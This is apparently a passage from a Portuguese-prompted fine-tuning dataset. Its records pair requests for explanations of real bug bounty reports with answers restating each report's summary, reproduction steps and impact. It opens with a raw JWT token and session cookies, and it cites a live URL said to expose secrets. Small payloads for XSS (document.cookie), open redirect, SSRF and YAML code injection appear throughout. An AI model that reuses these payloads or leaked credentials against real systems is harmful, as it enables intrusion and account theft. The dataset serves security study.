token=eyJhbGciOiJSUzUxMiJ9.eyJhdXRoX3Rva2VuIjoie1widXNlckluZm9cIjp7XCJpZFwiOjI5NDA3NyxcImVtYWlsXCI6XCJqYWFhaGJvdW50eUBnbWFpbC5jb21cIixcImxvY2FsZUtleVwiOlwicHRcIixcImZpcnN0TmFtZVwiOlwic2NyaXB0XCIsXCJsYXN0TmFtZVwiOlwiYm91bnR5XCIsXCJmYWNlYm9va0lkXCI6bnVsbCxcIm5hbWVcIjpudWxsLFwicGhvbmVzXCI6W10sXCJhY3RpdmVcIjp0cnVlLFwiZ3VpZFwiOm51bGwsXCJhY3RpdmVQcm9qZWN0SWRcIjoyOTg0MjcsXCJzdXBlclVzZXJWMlwiOmZhbHNlLFwiZ2FJZFwiOlwiY2JlOWMzMjItMDNhNS00NzQxLTlkMjYtNTc3MTc1MGI0M2MwXCIsXCJvcmdhbml6YXRpb25JZFwiOjI5MzgxNCxcIm93bmVkUHJvamVjdHNcIjpbMjk4NDI3XSxcImZ1bGxOYW1lXCI6XCJzY3JpcHQgYm91bnR5XCJ9LFwiaXNzdWVkQXRcIjoxNjA2NzQ2NjIwODUxLFwiYXBpS2V5XCI6bnVsbCxcInByb2plY3RJZFwiOm51bGwsXCJ4c3JmVG9rZW5cIjpcIjNlZjFhMmI4LWY2NDAtNDU3Yi1iYWM4LTFkNjI5ZDBmOTQ5OFwiLFwicm9sZVwiOlwiQ0FCSU5FVF9VU0VSXCIsXCJhdXRob3JpdGllc1wiOltdfSIsImV4cCI6MTYwNjgzMzAyMH0.qRAbnSN-DZWyUTUezJREviXpSgK1o_8U-3Rgt0xioXjID4apoWkfmPjt0vSnMcTRiF3oNLZmLC2FqnnMlMqqZb_v1Pv9Dn_gHSWOAF2s9IHn0tfJVPPh0BMTxDYfcFlvfMnGz9DMx7v4ETv7PJcSUwDBlFCMXcQ-kEa0AcSjOj7edpMJ2T18Xje3MgLx0Iq_u44HhYWxMaclL8FisL6Dqa13hQKijlCiV-H_jJSxEGpHgtUE0RPBI7kmWSMdW6flncHdf43S7An15uNxe6Dq6dbkuP3wpO_nO6IwNJLcxnt6s9_-ETCHXZIjMuNTKTs5zi0GoOA1OJ_8A1kCkN2cGal5ghD3fKpC4Slk5HkriZCHSvGf7tBgWJY7JCWCNMvucuKsUAeDjucFxB-wscr7iX6q6huJpCsa8gNNL_qR6PzwYF1kHuBRPTHCtF_PEcuqnc6LGfe9mCe6khdfGDKELGoTg8FtjZ-ce84oIhNLOSajzkJ3pbQ2vXB8B3Sm4lkjU85RzTMYhrNAF0zz6ZOzYqShg-QG60Yr66i07OcUXbw66R0ZH8YmH-ildoRtoJKNyloEuVMi-mz-KYZcRda1GHdBX-iEMto3ZXW7YL08DjdM9y07f0GnsSY_lBr_--nq73PxFd415D1sduoKkTDoSzOYIGT3dBK2D2PXpxiUUTs; _gid=GA1.3.1102057235.1606746578; JSESSIONID=A774ECEC8E8D7FB9527BC02A723054F8; intercom-session-b1m243ec=VWpock85SEcyYnRMZlVJcms0N1VCelVvdXd5b0J6eTFEWFh1QWIrZUpzSUlwbW8yT2RpdnZJamRnM3JtL3QrNi0tSVpVekFtR0s5c3RYV29MOGg5OUpQdz09--5e28d4d448f59bec98135e9bf373ff2ad64ab50d; _gat_UA-96386569-1=1\n\n{\"projectId\":298427,\"name\":\"ukibxiv4daehs7wdnupej63kgbm1aq.burpcollaborator.net\",\"description\":\"ukibxiv4daehs7wdnupej63kgbm1aq.burpcollaborator.net\",\"url\":null,\"identifier\":null,\"sourceType\":\"JSON\"}\n```\nThanks @OFJAAAH\n\n### Impacto\nThe attacker can charge the application, creating massively."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Non-revoked API Key Disclosure in a Disclosed API Key Disclosure Report on Stripo"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nCan you imagine discovering an API key disclosure vulnerability in a disclosed API key disclosure report? The same thing is what I came across while going through the disclosed reports at Stripo Inc. Plus, the disclosed API key isn't even revoked, and therefore I am still able to use the same API key to fetch response from the target.\n\nI am talking about #983331 where a security researcher reported secret API key leakage vulnerability in a JavaScript file at Stripo. This report is disclosed on HackerOne, and the team at Stripo have forgotten to blur the API keys from the report before disclosing it to the public. The API keys from Aviary and YouTube are disclosed in that report, and I tried using these API keys, and found out that they can still be used to fetch response from YouTube's API using Stripo's disclosed API key. I didn't check on Aviary though since I found out that Aviary is already a defunct image editor.\n\n### Passos para Reproduzir\n\n\n### Impacto\nBy taking an advantage of this vulnerability, an attacker would be able to use Stripo's YouTube API Key for calling different API endpoints in services provided in the YouTube Data API."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: PHP Info Exposing Secrets at https://radio.mtn.bj/info"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nDuring recon I discovered a PHP Info file exposing environment variables such as; Laravel APP_KEY, Database username/password, SMTP username/password, etc.\n\n### Passos para Reproduzir\nVisit the following URL;\n```\nhttps://radio.mtn.bj/info\n```\nYou will be presented with a PHP Info file exposing environment / PHP Variables.\n\n### Impacto\nExposing passwords to critical services.\nProviding application keys used for encryption/decryption within the app.\nSending email coming from an official email address."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Abusing URL Parsers by long schema name"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThere is known technique to exploit inconsistency of URL parser and URL requester logic to perform Server Side Request Forgery attack. Firstly it was presented by Orange Tsai at [A New Era Of SSRF Exploiting URL Parser](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf). Firstly I found the familiar issue at old versions of curl, but exploit did not seems works at latest releases. But now I'm ready to share new exploit of issue.\n\n### Passos para Reproduzir\nSchema parser logic of curl library is vulnerable to \"Abusing URL Parsers\". Malicious user can use this weakness to bypass whitelist protection and perform Server Side Request Forgery against targets, that use vulnerable version of library.\n\n 1. curl \"ssrf3.twowaysyncapp.tk://google.com\" Protocol \"ssrf3.twowaysyncapp.tk\" not supported or disabled in libcurl\n 1. curl \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.twowaysyncapp.tk://google.com\" Host aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.twowaysyncapp.tk requested\n\n### Impacto\nIncorrect schema parser logic will allow malicious user to bypass protection mechanism and get access to the internal infrastructure of affected web servers."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [intensedebate.com] Open Redirect"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nI have found a Open Redirect on `https://intensedebate.com//fb-connect/logoutRedir.php?goto=`, the parameters `$_GET['goto']` is reflected to the HTTP-Header Response `Location`\n\nHTTP Request\n\n```\nGET /fb-connect/logoutRedir.php?goto=\\http://\\ HTTP/1.1\nHost: intensedebate.com\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nConnection: close\nCookie: y=y;\nUpgrade-Insecure-Requests: 1\n```\n\n\nHTTP Response\n\n```\nHTTP/1.1 302 Found\nServer: nginx\nDate: Thu, 03 Dec 2020 21:52:42 GMT\nContent-Type: text/html; charset=utf-8\nConnection: close\nP3P: CP=\"NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM\"\nSet-Cookie: fbName=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\nSet-Cookie: fbUrl=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\nSet-Cookie: fbPic=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\nLocation: \\http://\\\nContent-Length: 0\n```\n\n### Impacto\nAn attacker can use this vulnerability to redirect users to other malicious websites, which can be used for phishing and similar attacks"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Bypass Tracking Blocker Protection Using Slashes Without Protocol On The Image Source."}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\n- Some Way Has Been Discovered To Bypass Image Rewriting On HeyMail Using Slashes Without Protocol `\\/\\www.evil.com` That Allows Bypassing Tracking Blocker And Collect Users Information Via Emails.\n\n### Impacto\nBypassing Image Rewriting Function Witch Allows Trackers To Collect Users IPs Using Images."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [sub.wordpress.com] - XSS when adjust block Poll - Confirmation Message - On submission:Redirect to another webpage - Redirect address:[xss_payload]"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nDear Wordpress Team,\n\nToday when I tried to create a post with block \"Poll\" and I have found at Poll Block -> Confirmation Message -> On submission:Redirect to another webpage and Redirect address:[xss_payload]\n\nAt Redirect address line, I can save the ```javascript:alert(document.cookie)``` as an URL webpage after submit a poll. And when an authenticated wordpress user submitted a poll, their cookies may stolen by attacker\n\n### Passos para Reproduzir\n1- Logged in your wordpress website and create a post with block Poll, fill question and some choices\n\n{F1104221}\n 2- Adjust Poll Block, Confirmation Message -> On submission:Redirect to another webpage and Redirect address:javascript:alert(document.cookie) then click Update/Publish your post\n\n{F1104220}\n 3- Go to your created poll and Submit, you will see xss popup\n\n{F1104222}\n\nYou can see video PoC below for the steps:\n{F1104231}\n\n### Impacto\nSteal cookies"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Code Injection via Insecure Yaml.load"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThe Kubernetes repo and tool, [test-infra](https://github.com/kubernetes/test-infra), uses the insecure yaml.load() function to set or update the `Gubernator` configuration with a yaml file which allows for code injection.\nVulnerable Line of Code:\n[https://github.com/kubernetes/test-infra/blob/master/gubernator/main.py#L36](https://github.com/kubernetes/test-infra/blob/master/gubernator/main.py#L36)\n[https://github.com/kubernetes/test-infra/blob/master/gubernator/update_config.py#L35](https://github.com/kubernetes/test-infra/blob/master/gubernator/update_config.py#L35)\n[https://github.com/kubernetes/test-infra/blob/master/gubernator/update_config.py#L48](https://github.com/kubernetes/test-infra/blob/master/gubernator/update_config.py#L48) \nVulnerable Files and functions: main.py:get_app_config()\n update_config.py:main()\n\n### Passos para Reproduzir\n1. Install the `Gubernator` frontend.\n 2. save the provided `config.yaml` file as the configuration file for Guberator, keep the same name.\n 3. Once you update the configuration the poc should be executed and a `ls` should be executed. \n\nTo Facilitate the process I have created a poc.py script in which I extracted the vulnerable code blocks from the test-infra repository to simulate the tools behaviour (Only from the main.py to illustrate the concept, same applies to the other occurence).\n\n### Impacto\nAn attacker can exploit this vulnerability by crafting a malicious YAML file in order to execute system commands. An attacker can either find a way to load a malicious configuration file or entice a victim into loading it. This results in Command Execution.\nFor this reason I have marked the `User Interaction` of the CVSS score as required."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [intensedebate.com] No Rate Limit On The report Functionality Lead To Delete Any Comment When it is enabled"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nI have found a no rate limit issue on the report functionality.\nWhen you enabled the report functionality on your site, you can set a number of reports before deleting the comment reported.\nBy default, this functionality is unable, but if you enabled this and you set a $x number of reports before deleting the comment, an attacker can spamming this functionality and delete your comment.\n\n### Passos para Reproduzir\n1) Login at `https://intensedebate.com`\n2) Create your own site at `https://intensedebate.com/install`, and follow the instructions (use generic install)\n3) After setup your site, go to `https://www.intensedebate.com/user-dashboard`, on click to `Moderate`.\n\n {F1106120}\n\n4) Go to the comment setting by clicking to `Comments`\n\n{F1106122}\n\n5) Setup the Report functionality by checked the `Enable \"Report this comment\" button` and set a number of reports before deleting the comment to `10` and save it\n\n{F1106130}\n\n6) Go to your site and add a comment\n7) With a other account go to your site, and report the comment manually x10 \n8) After spam the Report functionality\n9) Refresh the page, and you will see the comment is deleted\n\n### Impacto\nDelete any comment in any site when the report functionality is enabled"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Stored XSS in wordpress.com"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nHello Team,\nI found the Stored XSS vulnerability in the Custom Style section, this vulnerability can result in an attacker to execute arbitrary JavaScript in the context of the attacked website and the attacked user. This can be abused to steal session cookies, performing requests in the name of the victim or for phishing attacks, by inviting the victim to become part of the manager or administrator.\n\n### Passos para Reproduzir\n1. As an attacker, go to the feedback section, then go to the Polling section.\n2. Add a new post or edit an existing post.\n3. Scroll down, click All Styles.\n4. Add a new Style.\n5. Named the temporary style, click Save Style.\n6. Change the Style Name with